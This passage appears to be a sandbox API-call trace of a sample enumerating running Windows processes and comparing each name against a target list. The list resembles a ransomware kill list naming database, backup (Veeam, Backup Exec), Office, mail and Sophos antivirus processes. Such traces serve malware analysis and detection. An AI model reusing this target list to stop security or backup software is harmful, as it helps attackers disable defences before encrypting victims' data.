cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0153.858] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0153.858] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0153.858] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1028, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0153.859] CloseHandle (hObject=0x374) returned 1 [0153.859] SetEvent (hEvent=0x210) returned 1 [0153.859] Sleep (dwMilliseconds=0x2710) [0164.404] lstrcpyA (in: lpString1=0x567f090, lpString2="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" | out: lpString1="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v") returned="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" [0164.404] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x3d4 [0164.765] Process32FirstW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0164.766] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596b68 [0164.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3596b68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0164.766] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0164.766] StrStrIA (lpFirst="[System Process]", lpSrch="sql") returned 0x0 [0164.766] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0164.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0164.767] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e2f8 [0164.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e2f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0164.768] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0164.768] StrStrIA (lpFirst="System", lpSrch="sql") returned 0x0 [0164.768] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0164.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0164.769] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584448 [0164.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3584448, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0164.769] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0164.769] StrStrIA (lpFirst="smss.exe", lpSrch="sql") returned 0x0 [0164.769] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0164.770] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35844a8 [0164.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35844a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0164.770] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0164.770] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0164.770] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0164.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.772] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584508 [0164.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3584508, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0164.772] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0164.772] StrStrIA (lpFirst="wininit.exe", lpSrch="sql") returned 0x0 [0164.772] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0164.774] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584670 [0164.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3584670, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0164.774] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0164.774] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0164.774] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0164.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.775] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584628 [0164.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3584628, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0164.776] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0164.776] StrStrIA (lpFirst="winlogon.exe", lpSrch="sql") returned 0x0 [0164.776] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0164.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.777] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584760 [0164.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3584760, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0164.777] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0164.777] StrStrIA (lpFirst="services.exe", lpSrch="sql") returned 0x0 [0164.777] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0164.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0164.779] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584778 [0164.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3584778, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0164.779] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0164.779] StrStrIA (lpFirst="lsass.exe", lpSrch="sql") returned 0x0 [0164.779] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.780] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584520 [0164.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584520, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0164.781] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0164.781] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0164.781] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0164.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0164.782] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35845b0 [0164.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35845b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0164.782] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0164.782] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0164.782] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0164.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0164.784] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35845c8 [0164.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35845c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0164.784] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0164.784] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0164.784] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.785] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35845e0 [0164.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35845e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0164.785] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0164.786] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0164.786] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0164.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0164.787] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e358 [0164.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e358, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0164.787] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0164.787] StrStrIA (lpFirst="dwm.exe", lpSrch="sql") returned 0x0 [0164.787] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x62, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.789] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35847a8 [0164.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35847a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0164.789] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0164.789] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0164.789] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.790] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35846b8 [0164.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35846b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0164.810] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0164.810] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0164.810] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.812] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35846d0 [0164.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35846d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0164.812] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0164.812] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0164.812] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.813] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35845f8 [0164.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35845f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0164.813] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0164.814] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0164.814] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.815] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584688 [0164.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584688, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0164.815] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0164.815] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0164.815] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.059] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35846e8 [0165.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35846e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0165.059] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0165.059] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0165.060] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.062] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584700 [0165.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584700, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0165.062] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0165.062] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0165.062] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, 